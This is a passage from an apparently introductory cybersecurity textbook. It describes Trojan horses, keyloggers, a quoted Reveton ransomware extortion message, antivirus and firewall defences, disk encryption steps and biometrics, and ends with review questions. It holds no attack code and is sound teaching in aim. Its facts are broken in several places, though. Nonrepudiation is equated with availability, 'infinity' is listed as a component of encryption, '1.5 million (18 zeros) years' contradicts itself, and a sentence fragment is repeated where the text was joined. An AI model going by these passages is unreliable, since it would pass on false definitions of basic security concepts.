A Trojan horse planted in a computer may access the user’s address book and send phishing e-mails to other people with the Trojan horse attached to the e-mail. Users who open the attachment unknowingly download the Trojan horse onto their computer. Once on the computer, it accesses the address book and the process starts over. This way, the Trojan horse can spread to more and more computers. For instance, the Trojan horse “Sub7” or “SubSeven” was developed to attack computers running on a Windows 9.x platform. What makes Sub7 so dangerous is the ability of the malicious writer or another person to remotely control the program and issue any command to an infected system. There are a variety of commands that can be given, such as “send an e-mail to the attacker after installation,” or “melt server after installation.” This ability makes Sub7 a very flexible Trojan. Some of the less dangerous but very irritating things that the hacker can do is reversing mouse buttons, restarting Windows constantly, or changing desktop colors. Sub7 can also cause very serious damage to an infected system, however. This includes stealing data, taking control of text messaging, and overwriting or destroying files.51
- Watching users through their webcam
Trojan horses can also be used to spy on people via spyware. An author who infects a user’s computer with a Trojan horse may watch the user through the webcam and possibly watch their security system or children, daily routines, or other things. This type of software is also available for commercial purposes. For instance, online programs may use the commercial type of software such as “Proctor” to watch students while they are taking exams.
- Logging users’ keystrokes
A keylogger Trojan records users’ keystrokes, saves them to a file, and sends them to the author of the malicious software. The goal is to get information such as passwords, credit card numbers, or documents. Some keylogger software is more advanced and able to monitor for specific activity, such as opening a web browser pointing to a specific website (e.g., banking or credit card site). Keylogger programs are also available as commercial software for parents or employers to monitor children’s or employees’ online activity.52
- Recording usernames, passwords, and other personal information
In 2011, a Chinese Trojan horse hijacked the computer of the Japanese parliament intending to steal data. It is possible that the Chinese hackers were able to download passwords and other information stored on the government computer. These types of attacks are especially of concern for industrial companies and intellectual property, as stealing such information can result in companies going bankrupt. For instance, if a hacker could steal the blueprint for building a certain machine and then build the machine cheaper, the company that invented the machine could lose all its business.53
Case Study 3.4: The U.S. Government Firewall Virus
The U.S. government firewall virus is part of the Reveton family (Trojan/Win32.Reveton), which hijacks computers and demands a ransom to unblock the computer.54 This is also referred to as ransomware. Ransomware is “a type of malware that severely restricts access to the computer, device, or file, until a ransom is paid by the user.”55 The U.S. government firewall virus blocks the computer, encrypts files, and displays the following message that appears to be from the U.S. government.
The Firewall of the United States Computer Blocked
This computer has been blocked to Americans by the US Government Firewall
Illegally downloaded material
(audio, videos or software)
has been located on your computer
By downloading, those were reproduced, thereby involving a criminal offence under Section 106 of Copyright Act.
The downloading of the copyrighted material via the Internet or music sharing networks is illegal and is in the accordance with Section 106 of the Copyright Act subject to a fine or imprisonment for a penalty of up to 3 years.
Furthermore, possession of illegally downloaded material is punishable under Section 184 paragraph 3 of the Criminal Code and may also lead to the confiscation of the computer, with which the files were downloaded.
To perform the payment, enter the acquired GreenDot MoneyPack code in the designated payment field and press the “OK” button.
The U.S. government, of course, has not blocked the user’s computer, but rather the computer was infected with a Trojan horse and the cybercriminals are trying to extort money. The user can remove the malware by using software such as Hitman Pro.56 This is not true for all ransomware, however. In some cases, even the FBI is not able to remove the malware.
Ransomware attacks were first reported in Russia in 2005. There are ever new scams, and ransom attacks have become common around the globe. One of the most “successful” ransomware attacks was conducted with CryptoLocker. CryptoLocker infected hundreds of thousands of PCs because it was able to spread across computers connected to a network.
Most ransomware attacks on private users ask for $100 to $300 because that seems to be a sum users are willing to pay to get their data back. Attacks on companies or hospitals tend to ask for a lot more because the stakes for the victim are much higher. For instance, if a company cannot access its computers for several days, they may lose a lot of money. Cybercriminals are well aware of this predicament and use it to extort large sums of money. However, users carry the risk that even if they pay the ransom, there is no guarantee that the computer will be fully functional again. If the criminals demand payment via credit card, they may then also steal that information and additional financial losses to the victim may be incurred.57 A proven firewall and antivirus software helps avoid such intrusions. In addition, users should use other prevention methods discussed in the next section.
What Do You Think?
- If you were the victim of a ransomware attack, what negative consequences would that cause for you?
- What safeguards do you currently use to protect yourself against ransomware attacks? How can you improve your safeguards?
Preventing Malware Intrusions
There are several effective countermeasures users can employ to prevent infection of their computer with a malware.
Antivirus Software
Antivirus software is “a class of program that will prevent, detect and remediate malware infections on individual computing devices and IT systems.”58 Antivirus software programs recognize malware and prevent it from entering the computer by checking programs and comparing them to known malware. Viruses, worms, and Trojan horses are nothing more than a malicious code, and antivirus software detects these malicious codes. This is referred to as signature matching. Every virus has a specific signature, and antivirus software programs include a database of these virus signatures. The more comprehensive the database, the more likely is the detection of a virus. Unfortunately, no antivirus software is able to detect all viruses because the code must be known. Thus, new unknown malicious codes cannot be detected. In order to get the best possible protection, the user must update the software regularly and install patches to keep the database current because malware writers change the programs and develop new threats.59
Antivirus software is an inexpensive way to provide up-to-date protection for computers. There is a wide variety of antivirus software on the market. Some of the most popular ones are Avira, Bitdefender, McAfee, Norton Antivirus, and Sophos. Every antivirus program has its pros and cons. Good antivirus programs effectively recognize malware with real-time and on-demand scanners, are easy to install and use, and can scan files, such as e-mail attachments. They can also scan within compressed files quickly. Good antivirus software also does a heuristic check of the program for bad behavior to detect new unknown malware. Some antivirus software can repair a virus infection but typically only if the host file is not damaged.60 In addition to antivirus software, computers should also be protected by a firewall.
Firewall
A firewall is “a software program or piece of hardware that helps screen out hackers, viruses, and worms that try to reach your computer over the Internet.”61 Firewalls are an important part of cybersecurity. Companies who are using a firewall to protect their network must determine what type of Internet traffic they will allow for inbound and outbound traffic. The firewall must be configured in a way that it only allows approved traffic to pass. Any changes to the protocol should be approved and security logs should be reviewed regularly. A firewall is also important for private users, and users should be very careful to allow a website to open that was blocked by the firewall.62 Unfortunately, firewalls are not a fail-safe solution to criminals. Criminals may access a computer or network by using a virtual private network to get into another target, such as a power grid. For instance, the North American Equipment Council reported that a computer worm had penetrated their data storage system by migrating through the company’s corporate network.63
Thoughtful User Behavior
Some cybersecurity experts argue that technology has outpaced people in the sense that people use sophisticated technologies without any education about how a criminal views the technology and its potential for abuse. In the absence of such education, people make naturally bad decisions because it’s easy to use technology insecurely and difficult to use it securely.64 The following are rules users should follow to avoid infecting their computer or mobile devices with malware.
- Users should refrain from opening e-mail attachments that are unexpected or unsolicited, as these attachments are a common strategy to spread malware. Many of these attachments appear to come from friends, official agencies, or companies such as Microsoft, Adobe, etc. For instance, Microsoft does not send attachments for security updates. These attachments are hoaxes. Similarly, users should not open links in e-mails.
- Unsolicited CDs and DVDs can also contain malware. Users can check a CD or DVD with their antivirus software to make sure it does not contain malware. This strategy does not guarantee a clean CD or DVD, however. Criminals who write malware try their best to stay ahead of antivirus developers.
- Websites that offer free services such as TV live streams can be a trap, and great caution is warranted. Websites such as hahasport.com may ask users to update their Adobe Flash or some other media player if they want to stream TV for free. The provided link to the update is a link to a malware. Once the user clicks on the link, the malware infects the computer or mobile device.
- Threats also stem from applications such as Pokémon Go. Users may download a fake application that contains a malware instead of the actual program. It is also possible that users give inadvertent permission to access their phone or Google account.
- Weak or repetitive passwords are also a liability because malware can steal passwords. If a person uses the same password for several accounts or applications and it gets stolen, the criminal then has access to all of these accounts.65
Each of these rules makes it more difficult and cumbersome to use technology. Thus, many people choose to continue to ignore these rules and use technology insecurely. Cybersecurity would make great advances if it would make it easy to use technology securely and difficult to use it insecurely. That is very complicated, however, and we are not close to such breakthrough development.
Think About It 3.2: Pokémon Go, Cybercriminals, and Cybersecurity
The Pokémon Go fun, developed by Niantic Labs, started in July 2016 in the United States, Australia, and New Zealand, and then spread quickly across the globe. The current frenzy over the Japanese gaming app has not only inspired users to catch Pokémons but also cybercriminals to attack users. The game has substantial vulnerabilities. One of the threats was downloading the app from an unverified provider and falling victim to a malicious app that could delete or steal information, install spyware on the device, or take remote control of the device. Cybercriminals are able to use the actual app and turn it into a malware. Another issue revolved around the software used in the app. Apple iPhone users, due to a software bug, granted the app full permission to their Google account. The users were not informed about this issue when agreeing to the terms and conditions. Users who gave permission were advised that they should uninstall the app and revoke the permission to access Google.66
What Would You Do?
- What safeguards do you use before you download an app? As a reference article, read “Pokémon Go: When Cyber Security Breaches Real Life” at https://www.bluecatnetworks.com/blog/2016/07/25/pokemon-go-cyber-security-breaches-real-life/
- Pokémon Go uses location data to guide users to the Pokémons. How could criminals abuse these location services?
Encryption
Encryption is the obfuscation that is fast when you know the secret but very slow when you don’t. Encryption of data is still the most effective way to protect it from being stolen. It is also called cryptography. Even though the NSA has the capability to crack encrypted data, it is very difficult and resource intense. Also, some suggest that even the NSA cannot decrypt data encrypted with an Advanced Encryption Standard.67 Proper encryption encompasses five components: (1) attribution, (2) integrity of data, (3) nonrepudiation, (4) infinity, and (5) scrambled text. Attribution refers to a digital signature providing proof of authorship. The signature may be used to provide legal proof of a person’s communications and activities. It is imperative that only the person who has authority to sign can actually do so. If someone could posture as the signatory, the system is not secure. Imagine that the DoD receives a request for data about their latest stealth fighter plane from the president of the United States. In actuality, the request for information comes from a Chinese hacker working for the Chinese government with the intent to steal the data and reverse engineer the fighter jet. This type of cyberespionage is very common and can become a threat to national security.
Integrity of data “refers to protecting information from being modified by unauthorized parties.”68 Only information that is correct also has value. In addition, if data is manipulated, this can prove very costly. Imagine that the CIA sends information to the president of the United States about a possible nuclear attack against the United States by North Korea. In reality, the information was manipulated and there is no nuclear threat. The president could potentially authorize a preemptive strike against North Korea, which could lead to a war.
Nonrepudiation, also called availability, means that persons authorized to access information always have access to the information. One of the main cyberattacks today includes the denial to information for authorized persons. There are two main ways to deny access: denial-of-service (DoS) attacks and distributed denial-of-service (DDoS) attacks. In a DoS attack, the attacker may flood the network and overload it, which then makes it impossible for the authorized user to access the network and information. In a DDoS attack, the attacker typically accesses an innocent person’s computer to attack other computers by overwhelming them with data requests. In that sense, the attacker distributes the data from one or several computers that the attacker took control of prior to the attack by exploiting a security vulnerability of the computer.69 One of the largest DDoS attacks of its kind, if not the largest, was called the Mirai botnet. The Mirai botnet brought down much of the Internet in the United States and Europe, including Twitter, Netflix, Reddit, and CNN, in October 2016. The Mirai botnet was distinct from other attacks because it took advantage of the vulnerabilities of the Internet of Things (IoT). The IoT includes iPads, health trackers, smartwatches, and other consumer goods connected to the Internet. The sheer amount of IoT devices that have flooded the computer market has greatly increased the access of hackers to personal information and the ability of hackers to hijack the devices to carry out a DoS attack. These goods often have much less security than computers and are therefore easy to access by a hacker, making the attack much larger.
Infinity means that there should be such a great number of combinations to guess the encryption key that it would take around 1.5 million (18 zeros) years. This number would practically be infinity.70
The final condition is that the text must be scrambled by using a mathematical algorithm. The scrambled text is also referred to as ciphertext. “Keys” are used to encrypt and decrypt the text. To encrypt the text, a public key is used. This key is known to everyone and is distributed to the public. Since this public key can only encrypt the text (scramble the text) but not decrypt, it does not need to be kept
oes not need to be kept secret. A private key, however, must be kept private because it decrypts the text—that is, it makes it readable. The private key should only be known to the person receiving the message.71 If other people obtained the private key, they could read the text that was meant to stay private. For instance, messages sent by military leaders to their troops need to be kept secret or the safety of the troops could be in danger. If the enemy knows how the Navy SEALs are going to free a person, they could get killed during their mission.
Figures 3.1 and 3.2 illustrate how encryption and decryption work.
Figure 3.1 Encryption
The process of decryption is basically the reverse:
Figure 3.2 Decryption
What Can You Do?: Encrypting Your Computer
- MacOS
If you own a Macintosh computer, you can easily encrypt your data.
-
- – Open System Preferences
- – Click on Security and Privacy
- – Click on FileVault
- – Turn on the File Vault
- – You will receive a recovery key (DO NOT LOSE IT)
- – To turn the Encryption off, you will need the key
- PC
If you own a PC and you have Windows 10 Professional, you can use the software BitLocker, which is already built in.
-
- – Control Panel
- – System and Security
- – BitLocker Drive Encryption
If you own a PC and you don’t have Windows 10 Professional, you can use the software VeraCrypt.
-
- – Download VeraCrypt
- – Follow the instructions on the screen
Future Developments
Future Developments
One of the most promising technologies in cybersecurity is biometrics, which is “the measurement and statistical analysis of people’s physical and behavioral characteristics.”72 Biometrics is based on touch and movement information, and mainly used for identification and access to computers and mobile devices. Every person has unique characteristics and behaviors. Fingerprints have long been used by police to identify suspects in a crime. Fingerprints have also been used by companies to control who has access to certain areas. Thus, fingerprints can also be used for access to computers and mobile devices, and several companies, such as Apple, already offer that option. Another biometric option is behavioral data. Every person has a different way of typing, and software can recognize typing behaviors to determine whether the person who is typing is the actual owner. The use of the mouse is also distinct between people. Touchscreens are also being employed for user identification. Researchers have found that people touch different parts of a touchscreen. A software called SilentSense combines touching behavior (pressure, area, duration, position) with reaction of devices (rotation and acceleration).73 This type of technology is still developing, however, and hackers will likely find ways to disable or fool such systems.
Summary
Chapter 3 explains the difference between viruses, worms, and Trojan horses, and details the purposes for which they are being used. The chapter also provides insight into advanced persistent threats and denial-of-service attacks, such as the Mirai botnet. Finally, Chapter 3 provides an overview of basic cybersecurity measures that everyone can use to protect their computer and data. The use of malware has evolved into a multibillion-dollar business, and every Fortune 500 company is well aware that they are a constant target of hacker attacks and will likely have a data breach. Cybersecurity specialists state that 100% protection is impossible, and much depends on preparedness for a major attack. This is also true for major infrastructures, which are largely owned by private companies. A distributed denial-of-service attack on the power grid of Los Angeles, for example, could lead to great damage to the city. For instance, without power, there are no alarms and automatic doors would stay open. People could be looting and burglarizing houses. They could use the chaos of darkness to commit a variety of crimes. The Mirai botnet not only made headlines in the general public and among cybersecurity professionals because it took down much of the Internet of North America, but because it used the IoT (e.g., iPhones, video cameras, webcams, etc.) as botnets for the attacks. With the growing number of the IoT, the threat to private companies and critical infrastructures also increases. Cybersecurity measures are available, but technology always depends on human decision-making—the human factor. Part of the security challenge is to educate people about cybersecurity. The other challenge is to convince companies to build their IoT with good cybersecurity measures in place, but profit often trumps security in a field where time is money.
Key Terms
- Advanced Persistent Threat 43
- Antivirus Software 56
- Biometrics 61
- Firewall 55
- Malware 39
- Ransomware 37
- Social Engineering 53
- Spyware 54
- Trojan Horse 54
- Virus 39
- Worm 39
Discussion Questions
- Discuss similarities and differences between worms, viruses, and Trojan horses.
- Discuss the countermeasures to cyberthreats and how effective they are. What countermeasures would you suggest?
- Discuss the protections that antivirus software provide and based on what criteria you would choose your antivirus program.
- Read the reference article on “How to protect your computer networks from ransomware” (https://www.justice.gov/criminal-ccips/file/872771/download). Which of the measures described in the article are you using? Will you change your behavior based on what you have learned?
- Discuss what mobile devices you own and what the threats to your devices are. How can you protect your devices from cyber intrusions?
- Look at the ratings of different antivirus software programs and discuss the categories used to rank the programs. From what you have learned in the chapter, which categories are most important?